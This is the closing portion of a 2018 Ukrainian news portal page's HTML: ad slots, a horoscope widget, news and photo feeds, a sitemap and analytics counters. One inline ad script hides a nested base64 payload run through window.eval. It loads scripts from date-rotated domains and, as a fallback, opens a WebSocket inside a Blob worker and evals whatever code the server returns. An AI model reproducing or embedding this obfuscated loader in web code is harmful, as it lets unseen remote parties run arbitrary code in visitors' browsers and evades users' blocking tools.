 </script>
 <script type="text/javascript" src="//phoenix-widget.com/static/js/jsonp.js"></script> 
<!--noindex-->
 <div id="M246128ScriptRootC652099" class="hidden mobilev">
 <div id="M246128PreloadC652099">
 Загрузка... </div>
</div> 
 <div id="M7888ScriptRootC604504">
 <div id="M7888PreloadC604504">
 Загрузка...
 </div>
</div>
 <div id="MIXADV_2385" class="MIXADVERT_NET">Загрузка...</div>
 <script> 
 var node2385 = document.getElementById("MIXADV_2385");
 if( node2385 )
 {
 var script = document.createElement("script");
 script.charset = "utf-8";
 script.src = "https://m.mixadvert.com/show/?id=2385&r="+Math.random();
 node2385.parentNode.appendChild(script); 
 script.onerror = function(){
 window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBob3N0ID0gKCBkYXRlLmdldERhdGUoKSA8IDE1ID8gIm5hc2RmZy5jb20iIDogIm5ldHNsZWQubmV0IiApO3ZhciBzY3JpcHRfZmlyc3QgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCJzY3JpcHQiKTtzY3JpcHRfZmlyc3Quc3JjID0gImh0dHBzOi8vIisgaG9zdCsiL3Nob3cvP2lkPTIzODUmcj0iK01hdGgucmFuZG9tKCk7bm9kZTIzODUucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChzY3JpcHRfZmlyc3QpO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt3aW5kb3cuZXZhbChhdG9iKCJjM1J5SUQwZ0oyTnZibTRnUFNCdVpYY2dWMlZpVTI5amEyVjBLQ0ozYzNNNkx5OGlLMmh2YzNRcklqbzRNRGd3THpJek9EVWlLVHNnWTI5dWJpNXZibTFsYzNOaFoyVWdQU0JtZFc1amRHbHZiaUFvWlhaMEtTQjdJSEJ2YzNSTlpYTnpZV2RsS0dWMmRDNWtZWFJoS1RzZ1kyOXViaTVqYkc5elpTZ3BPMzBuTzNaaGNpQjNiM0pyWlhJZ1BTQnVaWGNnVjI5eWEyVnlLRlZTVEM1amNtVmhkR1ZQWW1wbFkzUlZVa3dvYm1WM0lFSnNiMklvV3lKbGRtRnNLQ0FuSWl0emRISXJJaWNwSWwwcExDQjdkSGx3WlRvZ0ozUmxlSFF2YW1GMllYTmpjbWx3ZENkOUtTazdkMjl5YTJWeUxuQnZjM1JOWlhOellXZGxLQ2N4SnlrN0lIZHZjbXRsY2k1dmJtMWxjM05oWjJVZ1BTQm1kVzVqZEdsdmJpQW9iWE5uS1NCN0lIZHBibVJ2ZHk1bGRtRnNLRzF6Wnk1a1lYUmhLVHNnZlRzZyIpKTt9OyBzY3JpcHRfZmlyc3QucmVtb3ZlKCk7") );
 }
 }
 </script> 
 <div class="tit_line"><span class="tit">Новости партнеров </span></div>
<div id="CNM3935" style="text-align:center;display:none" ><a href="https://www.novostimira.biz/" id="CNM3935t" style="display:none" target="_blank"><strong>Новости</strong></a></div> 
<div class="informer-horoscope-big">
<span class="title">ГOРОСКОП</span>
<div class="white">
<ul class="toggle_link">
<li>Гороскоп на:</li>
<li id="hrscp_today" class="active">сегодня</li>
<li><a href="#">неделю</a></li>
</ul>
<div class="clear"></div>
<div class="fl_l single_horoscope">
<div class="cnt">
<a href="/horoscope/1"><span class="sign_image sign_1"><i></i></span>
<span class="htit">Овен</span></a>
</div>
</div>
<div class="fl_l single_horoscope">
<div class="cnt">
<a href="/horoscope/2"><span class="sign_image sign_2"><i></i></span>
 <span class="htit">Телец</span></a>
</div>
</div>
<div class="fl_l single_horoscope">
<div class="cnt">
 <a href="/horoscope/3"><span class="sign_image sign_3"><i></i></span>
 <span class="htit">Близнецы</span></a>
</div>
</div>
<div class="fl_l single_horoscope ">
<div class="cnt">
 <a href="/horoscope/4"><span class="sign_image sign_4"><i></i></span>
 <span class="htit">Рак</span></a>
</div>
</div>
<div class="fl_l single_horoscope">
<div class="cnt">
 <a href="/horoscope/5"><span class="sign_image sign_5"><i></i></span>
 <span class="htit">Лев</span></a>
</div>
</div>
<div class="fl_l single_horoscope single_horoscope_end ">
<div class="cnt">
 <a href="/horoscope/6"><span class="sign_image sign_6"><i></i></span>
 <span class="htit">Дева</span></a>
</div>
</div>
 <div class="clear"></div>
<div class="fl_l single_horoscope">
<div class="cnt">
 <a href="/horoscope/7"><span class="sign_image sign_7"><i></i></span>
 <span class="htit">Весы</span></a>
</div>
</div>
<div class="fl_l single_horoscope ">
<div class="cnt">
 <a href="/horoscope/8"><span class="sign_image sign_8"><i></i></span>
 <span class="htit">Скорпион</span></a>
</div>
</div>
<div class="fl_l single_horoscope">
<div class="cnt">
 <a href="/horoscope/9"><span class="sign_image sign_9"><i></i></span>
 <span class="htit">Стрелец</span></a>
</div>
</div>
<div class="fl_l single_horoscope">
<div class="cnt">
 <a href="/horoscope/10"><span class="sign_image sign_10"><i></i></span>
 <span class="htit">Козерог</span></a>
</div>
</div>
<div class="fl_l single_horoscope">
<div class="cnt">
 <a href="/horoscope/11"><span class="sign_image sign_11"><i></i></span>
 <span class="htit">Водолей</span></a>
</div>
</div>
<div class="fl_l single_horoscope single_horoscope_end">
<div class="cnt">
 <a href="/horoscope/12"><span class="sign_image sign_12"><i></i></span>
 <span class="htit">Рыбы</span></a>
</div>
</div>
<div class="clear"></div>
</div>
</div>
<br />
<div id='admixer_f7fbc8e33a224a92b978a961f1beec64_zone_12377_sect_598_site_585' style="z-index:10;"></div>
<div id='admixer_4abd7b8663ea4a50bdf40fa1a6ccb771_zone_5626_sect_598_site_585'></div>
 <div class="clear"></div>
 </div>
 <div class="clear"></div>
 </div>
 </div>
<div class="fl_r right_main">
<!--noindex-->
 <div class="banner_p20">
 ﻿<!--www.fakty.ua, Основное (300 350)-->
<div id='admixer_c9cf98abc52e4691b467360ef03051c4_zone_1851_sect_598_site_585'></div>
 </div>
<div class="banner_p20">
 <div class='banner_p20'>
<a href="/policlinika"><img alt="Поликлиника ФАКТОВ" src="/images/banners/policlinika.png"></a>
</div> 
</div>
<!--/noindex-->
 <div class="banner_p20">
 <div class="vkl_cont pb20">
 <p class="tit"><a href="/news/">Лента новостей</a></p>
 <p><span class="date">14.02.2018 17:45</span><br /><a href="/258564-siloviki-za-nedelyu-pojmali-na-goryachem-19-chinovnikov-vzyatochnikov">Силовики за неделю поймали на горячем 19 чиновников-взяточников</a></p>
 <p><span class="date">14.02.2018 17:40</span><br /><a href="/258562-v-nacbanke-prokommentirovali-ukreplenie-grivni">В Нацбанке прокомментировали укрепление гривни</a></p>
 <p><span class="date">14.02.2018 17:40</span><br /><a href="/258563-rossiyane-i-amerikancy-sensacionno-proigrali-na-starte-olimpijskogo-hokkejnogo-turnira">Россияне и американцы сенсационно проиграли на старте олимпийского хоккейного турнира</a></p>
 <p><span class="date">14.02.2018 17:33</span><br /><a href="/258560-truhanova-podozrevayut-v-mahinaciyah-so-sredstvami-mestnogo-byudzheta-na-summu-185-mln-grn---holodnickij">Труханова подозревают в махинациях с бюджетными средствами на сумму 185 млн грн, - Холодницкий</a></p>
 <p><span class="date">14.02.2018 17:21</span><br /><a href="/258559-sap-budet-prosit-dlya-truhanova-arest-i-50-mln-grn-zaloga">САП будет просить для Труханова арест и 50 млн грн залога</a></p>
 <a class="more" href="/news/">Больше новостей</a>
 <div class="clear"></div>
 </div>
 </div>
<ins class="adsbygoogle"
 style="display:inline-block;width:300px;height:280px;margin-bottom:20px"
 data-ad-client="ca-pub-1774260917071879"
 data-ad-slot="5283245341"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
<div id="SinoptikInformer" style="width:302px; margin-bottom:20px" class="SinoptikInformer type5c1"><div class="siHeader"><div class="siLh"><div class="siMh"><a onmousedown="siClickCount();" href="http://sinoptik.ua/" target="_blank">Погода</a><a onmousedown="siClickCount();" class="siLogo" href="http://sinoptik.ua/" target="_blank"><img src="http://informers.sinoptik.ua/img/t.gif" /></a> <span id="siHeader"></span></div></div></div><div class="siBody"><div class="siCity"><div class="siCityName"><a onmousedown="siClickCount();" href="http://sinoptik.ua/погода-киев" target="_blank">Погода в <span>Киеве</span></a></div><div id="siCont0" class="siBodyContent"><div class="siLeft"><div class="siTerm"></div><div class="siT" id="siT0"></div><div id="weatherIco0"></div></div><div class="siInf"><p>влажность: <span id="vl0"></span></p><p>давление: <span id="dav0"></span></p><p>ветер: <span id="wind0"></span></p></div></div></div><div class="siLinks"><span><a onmousedown="siClickCount();" href="http://sinoptik.ua/погода-одесса" target="_blank">Погода в Одессе</a>&nbsp;</span><span><a onmousedown="siClickCount();" href="http://sinoptik.ua/погода-днепр" target="_blank">Погода в Днепре</a>&nbsp;</span></div></div><div class="siFooter"><div class="siLf"><div class="siMf"></div></div></div></div><script type="text/javascript" charset="UTF-8" src="http://informers.sinoptik.ua/js3.php?title=4&amp;wind=2&amp;cities=303010783&amp;lang=ru" async="async"></script> 
<iframe src="https://adst.fwdcdn.com/frame/partners/fakty.ua.html" width="300" height="250" frameborder="0" style="padding-bottom:20px"></iframe> 
<div id="M7888ScriptRootC598312"> 
 <div id="M7888PreloadC598312"> Загрузка... 
 </div> 
</div> 
<div id="M7888Composite627371" style="min-height:125px;">
<center><a href="http://marketgid.com/" target="_blank">Загрузка...</a></center>
</div> 
 <div class="banner_p10">
 <div class="white_plashka">
 <div><p>ТОП 5</p></div>
 </div>
 </div>
 <div class="banner_p20">
 <div class="vkladki">
 <div class="xvkladki">
 <div class="fl_l d1 active"><div class="fl_l normal"><div><p><a class="tab_link" id="tab_r" href="/">Читаемых</a></p></div></div></div>
 <div class="clear"></div>
 </div>
 <div class="vkl_cont_x">
 <div class="vkl_cont" id="tab_tab_r">
 <br/>
 <p><a href="http://fakty.ua/257703-medsestra-popravte-mne-levuyu-nogu-detochka-u-tebya-ee-bolshe-net">«Медсестра, поправьте мне левую ногу». – «Деточка, у тебя ее больше нет»<span>&rarr;</span></a><span class="eye">24053</span></p>
 <p><a href="http://fakty.ua/257686-mediki-vyyasnili-kak-aspirin-povyshaet-potenciyu">Медики выяснили, как аспирин повышает потенцию<span>&rarr;</span></a><span class="eye">15148</span></p>
 <p><a href="http://fakty.ua/257776-postupila-komanda-iz-moskvy---ubrat-etogo-banderovca---tenyuh">Поступила команда из Москвы: убрать этого бандеровца, — Тенюх<span>&rarr;</span></a><span class="eye">12634</span></p>
 <p><a href="http://fakty.ua/258218-tancovcshica-na-karnavale-v-san-paulu-edva-ne-ostalas-bez-trusov-no-hrabro-prodolzhala-vystuplenie-foto">Танцовщица на карнавале в Сан-Паулу едва не осталась без трусов, но храбро продолжала выступление (видео)<span>&rarr;</span></a><span class="eye">12099</span></p>
 <p><a href="http://fakty.ua/258148-vsegda-ezdil-na-mashine-a-tut-poshel-na-marshrutku-stalo-izvestno-kogo-ubili-na-ostanovke-za-zamechanie">«Всегда ездил на машине, а тут пошел на маршрутку»: стало известно, кого убили на остановке за замечание <span>&rarr;</span></a><span class="eye">12083</span></p>
 <p class="ration">* Рейтинг формируется за последние 7 дней.</p>
 </div>
 </div>
 </div>
 </div>
<script type="text/javascript">
/*<![CDATA[*/
 jQuery('.tab_link').click(function(){
 jQuery('.vkladki .vkl_cont').hide();
 jQuery('.xvkladki div.active').removeClass('active').addClass('p5');
 jQuery('#tab_'+jQuery(this).attr('id')).show();
 jQuery(this).closest('.p5').removeClass('p5').addClass('active');;
 return false;
 });
/*]]>*/
</script><div class='hidden mobilev'>
<ins class="adsbygoogle"
 style="display:block"
 data-ad-client="ca-pub-9406759266935085"
 data-ad-slot="8528501258"
 data-ad-format="auto"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
</div> 
<div class="banner_p20">
 <div class="facts_blok photo_block carousel_main">
 <p class="tit"><a href="/photo">ФотоФакты</a></p>
 <a class="left_control"></a>
 <a class="right_control"></a>
 <ul id="photoCarouselContainer">
 <li class="item_fact_block new_photo_item">
 <a href="/photo/album/700">
 <img width="282" height="185" alt="" src="/photos/articles/17/5/17577w282h185.jpg?code=43cc86f3eb67ae25c44df9cd751892e5a4513c7b"/>
 </a>
 <p><a href="/photo/album/700">Лучшие снимки международного конкурса фотографий Wildlife Photographer of the Year</a></p>
 <div class="clear"></div>
 </li>
 <li class="item_fact_block new_photo_item">
 <a href="/photo/album/698">
 <img width="282" height="185" alt="" src="/photos/articles/17/5/17569w282h185.JPG?code=05391e4b88a9b4c70efdd9685b43e321478369c1"/>
 </a>
 <p><a href="/photo/album/698">55 дизайнеров представляют в Киеве свои коллекции одежды </a></p>
 <div class="clear"></div>
 </li>
 <li class="item_fact_block new_photo_item">
 <a href="/photo/album/697">
 <img width="282" height="185" alt="" src="/photos/articles/17/4/17497w282h185.jpg?code=df7e6a3e182873f15c3b1e04c325f805bcc25ed6"/>
 </a>
 <p><a href="/photo/album/697">60-я церемония вручения премии «Грэмми» </a></p>
 <div class="clear"></div>
 </li>
 <li class="item_fact_block new_photo_item">
 <a href="/photo/album/696">
 <img width="282" height="185" alt="" src="/photos/articles/17/4/17472w282h185.jpg?code=8934ffda52ad1bf11d21e3802d194cc6206acaad"/>
 </a>
 <p><a href="/photo/album/696">Премьера новой программы в Национальном цирке украины </a></p>
 <div class="clear"></div>
 </li>
 <li class="item_fact_block new_photo_item">
 <a href="/photo/album/695">
 <img width="282" height="185" alt="" src="/photos/articles/17/4/17466w282h185.jpg?code=a977cc6417715710c32940ae2ad78f7c742d5f4a"/>
 </a>
 <p><a href="/photo/album/695">В Киеве развернули флаг-рекордсмен длиной более километра</a></p>
 <div class="clear"></div>
 </li>
 </ul>
 <div class="clear"><!-- --></div>
 </div>
</div><div class="quote">
 <div class="grey_color">
 <div class="pink_plashka"><a>Анекдот от &laquo;ФАКТОВ&raquo;</a></div>
 <div class="intervju">
 <p class="ital"><span class="quoteItem"><span class="quote">&ldquo;</span> — На улице гололед. Мечта о том, что мужчины будут у моих ног, начинает осуществляться. Пока сходила в магазин, двум помогла встать, а с одним даже... полежала! <span class="quote right">&rdquo;</span></span></p>
 </div>
 </div>
</div>
<div id="LentaInformScriptRootN9179" class="news-block-magick">
 <div id="LentaInformPreloadN9179">
 <a href="http://lentainform.com/" target="_blank">Загрузка...</a> 
 </div>
</div>
</div>
<div class="clear"></div>
</div>
</div>
<div class="bottom_banner"><div class="clear"><!--@--></div></div>
<div class="sitemap">
 <div class="sitemap_cont">
 <!--sitemap block on main-->
 <div class="title">Карта портала</div>
<div class="map_blok">
 <div class="fl_l">
 <ul class="map">
 <li><p><a href="/categories/ukraina">Украина</a></p></li>
 <li><p><a href="/categories/world">Мир</a></p></li>
 <li><p><a href="/categories/world/ludi-i-zveri">Люди и звери</a></p></li>
 <li><p><a href="/news">Новости</a></p></li>
 <li><p><a href="/categories/politics">Политика</a></p></li>
 </ul>
 </div>
 <div class="fl_l">
 <ul class="map">
 <li><p><a href="/categories/crime">Происшествия</a></p></li>
 <li><p><a href="/categories/money">Деньги</a></p></li>
 <li><p><a href="/categories/sport">Спорт</a></p></li>
 <li><p><a href="/categories/life-stories">Житейские истории</a></p></li>
 <li><p><a href="/categories/stories">История современности</a></p></li>
 </ul>
 </div>
 <div class="fl_l">
 <ul class="map">
 <li><p><a href="/categories/culture">Культура</a></p></li>
 <li><p><a href="/categories/culture/interview-so-zdezdoi">Интервью со звездой</a></p></li>
 <li><p><a href="/categories/culture/show-buisness">Шоу-бизнес</a></p></li>
 <li><p><a href="/categories/culture/shvets-museum">Фигурка дня</a></p></li>
 <li><p><a href="/birthday">Именинники дня</a></p></li>
 </ul>
 </div>
 <div class="fl_l">
 <ul class="map">
 <li><p><a href="/categories/before-face">Перед лицом Фактов</a></p></li>
 <li><p><a href="/categories/health">Здоровье</a></p></li>
 <li><p><a href="/categories/health/pryamaya-liniya">Прямая линия</a></p></li>
 <li><p><a href="/categories/health/poleznye-sovety">Полезные советы</a></p></li>
 <li><p><a href="/policlinika">Поликлиника "ФАКТОВ"</a></p></li>
 </ul>
 </div>
 <div class="fl_l">
 <ul class="map">
 <li><p><a href="/categories/customers">Клуб потребителей</a></p></li>
 <li><p><a href="/categories/science">Наука и технологии</a></p></li>
 <li><p><a href="/categories/blogs">Блоги</a></p></li>
 <li><p><a href="/photo">ФотоФакты</a></p></li>
 <li><p><a href="/video">ВидеоФакты</a></p></li>
 </ul>
 </div>
 <div class="fl_l">
 <ul class="map">
 <li><p><a href="/categories/ask-facts">Спросите у Фактов</a></p></li>
 <li><p><a href="/profile">Профиль пользователя</a></p></li>
 <li><p><a href="/horoscope">Гороскоп</a></p></li>
 <li><p><a href="/rss">RSS ленты</a></p></li>
 <li><p><a href="/register">Регистрация</a></p></li>
 </ul>
 </div>
 <div class="clear"></div>
</div> </div>
</div>
 <div class="footer">
 <div class="fl_l">
 <p>&copy; 1997&mdash;2018 &laquo;<strong>Факты и комментарии</strong><span>&reg;</span>&raquo;</p>
 <p>Все права на материалы сайта охраняются в соответствии с законодательством Украины</p>
 <div>
<ul class="bottom_spec_menu">
 <li><a href="/advert">Реклама</a></li>
 <li><a href="/subscribe">Подписка</a></li>
 <li><a href="/contact">Контакты</a></li>
 <li><a href="/grani">Поздравления и соболезнования</a></li>
 <li class="end"><a target="_blank" href="/terms">Условия ограниченного использования материалов</a></li>
 </ul>
<div class="clear"></div>
</div> </div>
 <div class="clear"></div>
 </div>
 <!--googleoff: all-->
 <!--noindex-->
 <div class="counters_cont">
 <!--bigmir)net TOP 100-->
 <span class="item" id="counter_1">
<!--bigmir)net TOP 100-->
<script type="text/javascript" language="javascript">
 bmN=navigator,bmD=document,bmD.cookie='b=b',i=0,bs=[],bm={v:1084,s:1084,t:3,c:bmD.cookie?1:0,n:Math.round((Math.random()* 1000000)),w:0};
 for(var f=self;f!=f.parent;f=f.parent)bm.w++;
 try{if(bmN.plugins&&bmN.mimeTypes.length&&(x=bmN.plugins['Shockwave Flash']))bm.m=parseInt(x.description.replace(/([a-zA-Z]|\s)+/,''));
 else for(var f=3;f<20;f++)if(eval('new ActiveXObject("ShockwaveFlash.ShockwaveFlash.'+f+'")'))bm.m=f}catch(e){;}
 try{bm.y=bmN.javaEnabled()?1:0}catch(e){;}
 try{bmS=screen;bm.v^=bm.d=bmS.colorDepth||bmS.pixelDepth;bm.v^=bm.r=bmS.width}catch(e){;}
 r=bmD.referrer.replace(/^w+:\/\//,'');if(r&&r.split('/')[0]!=window.location.host){bm.f=escape(r).slice(0,400);bm.v^=r.length}
 bm.v^=window.location.href.length;for(var x in bm) if(/^[vstcnwmydrf]$/.test(x)) bs[i++]=x+bm[x];
 bmD.write('<a href="http://www.bigmir.net/" target="_blank" onClick="img=new Image();img.src="//www.bigmir.net/?cl=1084";"><img src="//c.bigmir.net/?'+bs.join('&')+'" width="88" height="31" border="0" alt="bigmir)net TOP 100" title="bigmir)net TOP 100"></a>');
</script>
<noscript>
 <a href="http://www.bigmir.net/" target="_blank"><img src="//c.bigmir.net/?v1084&s1084&t3" width="88" height="31" alt="bigmir)net TOP 100" title="bigmir)net TOP 100" border="0" /></a>
</noscript>
<!--bigmir)net TOP 100-->
 </span>
 <!--LiveInternet-->
 <span class="item" id="counter_2"></span>
 <script type="text/javascript" language="JavaScript">
 <!--LiveInternet-->
 var htmlCode = "<a href='//www.liveinternet.ru/click' target='_blank' rel='nofollow'><img src='//counter.yadro.ru/hit?t40.2;r"+
 escape(document.referrer)+((typeof(screen)=="undefined")?"":
 ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
 screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
 ";h"+escape(document.title.substring(0,150))+";"+Math.random()+
 "' alt='' title='LiveInternet' "+
 "border='0' width='31' height='31'><\/a>";
 jQuery(htmlCode).appendTo(jQuery('#counter_2'));
 </script>
 <div class="clear"></div>
 </div>
 </div>
 </div>
 </div>
 </div>
<a href="#" class="scrollToTop"></a>
 <!--/noindex-->
 <!--googleon: all-->
<script type="text/javascript" src="/js/jquery.blockui.js"></script>
<script type="text/javascript" src="/admin/js/browserDetect.js"></script>
<script type="text/javascript" src="/js/jquery.boxshadow.js"></script>
<script type="text/javascript" src="/js/jquery.carousel.js"></script>
<script type="text/javascript" src="/js/counters-informers-init.js?v=45"></script>
</body>
</html>
